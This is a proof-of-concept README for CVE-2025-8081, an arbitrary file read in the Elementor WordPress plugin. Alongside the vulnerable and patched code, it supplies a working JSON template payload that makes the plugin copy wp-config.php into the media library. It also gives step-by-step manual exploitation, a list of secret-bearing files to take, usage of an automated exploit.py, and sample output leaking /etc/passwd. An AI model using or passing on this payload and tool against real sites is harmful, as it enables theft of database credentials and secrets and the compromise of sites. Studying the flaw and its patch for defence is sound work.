PoC for CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability# CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability
A critical arbitrary file read vulnerability in Elementor WordPress plugin that allows authenticated administrators to read any file accessible by the web server, including sensitive configuration files containing database credentials.
---
## 📋 Vulnerability Overview
### CVE Information
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-8081 |
| **Type** | Arbitrary File Read (CWE-22: Path Traversal) |
| **CVSS Score** | 4.9 (Medium) - **Real Impact: CRITICAL** |
| **CVSS Vector** | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N |
| **Affected Versions** | Elementor ≤ 3.30.2 |
| **Fixed Version** | Elementor ≥ 3.30.3 |
| **Release Date** | July 22, 2025 |
| **Disclosure Date** | October 15, 2025 |
### Attack Requirements
- ✅ WordPress Administrator account
- ✅ Elementor plugin installed and activated
- ✅ Access to template import functionality
- ✅ Image Elementor Widget enabled
### Impact
- 🔴 **Arbitrary File Read**: Read any file accessible by the web server user (www-data)
- 🔴 **Credential Theft**: Access to `wp-config.php` reveals database credentials and security keys
- 🔴 **Database Compromise**: Full access to WordPress database using stolen credentials
---
## 🎯 Vulnerability Details
### Location
The vulnerability exists in a **single file** at a **single line**:
```
elementor/includes/template-library/classes/class-import-images.php
Line 115 (v3.28.3)
```
### Vulnerable Code (v3.28.3)
```php
if ( isset( $attachment['tmp_name'] ) ) {
// Used when called to import a directly-uploaded file.
$filename = $attachment['name'];
$file_content = Utils::file_get_contents( $attachment['tmp_name'] ); // ❌ NO VALIDATION!
}
```
**Problem**: The `tmp_name` parameter is **NOT validated** with `is_uploaded_file()`, allowing an attacker to specify **arbitrary file paths**.
### Patched Code (v3.30.3)
```php
if ( isset( $attachment['tmp_name'] ) ) {
// Used when called to import a directly-uploaded file.
$filename = $attachment['name'];
$file_content = false;
// security validation in case the tmp_name has been tampered with
if ( is_uploaded_file( $attachment['tmp_name'] ) ) { // ✅ VALIDATION ADDED!
$file_content = Utils::file_get_contents( $attachment['tmp_name'] );
}
}
```
**Fix**: The patch adds `is_uploaded_file()` validation to ensure `tmp_name` refers to a legitimate HTTP POST uploaded file.
---
## 💣 Proof of Concept
### JSON Payload
```json
{
"content": [{
"id": "s1",
"elType": "section",
"settings": [],
"elements": [{
"id": "c1",
"elType": "column",
"settings": {"_column_size": 100},
"elements": [{
"id": "w1",
"elType": "widget",
"widgetType": "image",
"settings": {
"image": {
"url": "http://x.com/x.jpg",
"id": 1,
"tmp_name": "/var/www/html/wp-config.php",
"name": "leaked_config.txt"
}
},
"elements": []
}]
}]
}],
"version": "0.4",
"type": "page"
}
```
### Manual Exploitation Steps
1. Login to WordPress as Administrator
2. Navigate to **Elementor** → **My Templates** → **Import Templates**
3. Upload the JSON payload above (save as `payload.json`)
4. Click **Import Now**
5. Go to **Media** → **Library**
6. Find and download `leaked_config.txt`
**Result**: `wp-config.php` content with database credentials exposed!
---
## 📊 Interesting Files to Exfiltrate
### Critical Files
| File | Description | Impact |
|------|-------------|--------|
| `/var/www/html/wp-config.php` | WordPress configuration | 🔴 **CRITICAL** - DB credentials |
| `/proc/self/environ` | Environment variables | 🔴 **CRITICAL** - API keys, secrets |
|
### High Value Files
| File | Description | Impact |
|------|-------------|--------|
| `/etc/passwd` | System users | 🟠 **HIGH** - User enumeration |
| `/var/www/html/.htaccess` | Web server config | 🟠 **HIGH** - Configuration disclosure |
| `/var/log/apache2/access.log` | Apache logs | 🟡 **MEDIUM** - Information disclosure |
---
## 🛠️ Automated Exploitation
### Quick Start
```bash
python3 exploit.py -t https://target.com -u admin -p password123
```
### Command-Line Options
```
Required Arguments:
-t, --target URL Target WordPress URL (e.g., https://target.com)
-u, --user USERNAME WordPress admin username
-p, --password PASS WordPress admin password
Optional Arguments:
-f, --file PATH File to read (default: /var/www/html/wp-config.php)
-o, --output FILE Output filename (default: auto-generated)
--insecure, -k Disable SSL certificate verification
-v, --verbose Enable verbose output for debugging
-h, --help Show help message
```
### Usage Examples
```bash
# Basic exploitation (reads wp-config.php with default payload)
python3 exploit.py -t http://target.com -u admin -p password123
# Custom target file
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd
# With HTTPS and self-signed certificate
python3 exploit.py -t https://target.com -u admin -p password123 --insecure
# Verbose mode with custom output
python3 exploit.py -t http://target.com -u admin -p password123 \
-f /etc/passwd -o users.txt -v
# From OrbStack/Docker targeting host machine
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v
```
### Expected Output
```
Kali:~$ python3 exploit.py -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd
======================================================================
CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File: /etc/passwd
======================================================================
[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes
======================================================================
EXPLOITATION SUCCESSFUL!
======================================================================
File URL: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to: leaked_passwd.txt
--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================
```
---
## ⚖️ Legal Disclaimer
**FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY**
This tool is provided for security research and penetration testing purposes only. Usage of this tool for attacking targets without prior mutual consent is **illegal**.
**It is the end user's responsibility to obey all applicable local, state, and federal laws.**
- ✅ Use only on systems you own or have explicit written permission to test
- ✅ Responsible disclosure practices
- ✅ Educational and research purposes
- ❌ Unauthorized access is illegal and punishable by law
- ❌ The author assumes no liability for misuse
**By using this tool, you agree to use it legally and ethically.**
---
Last Updated: October 17, 2025
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view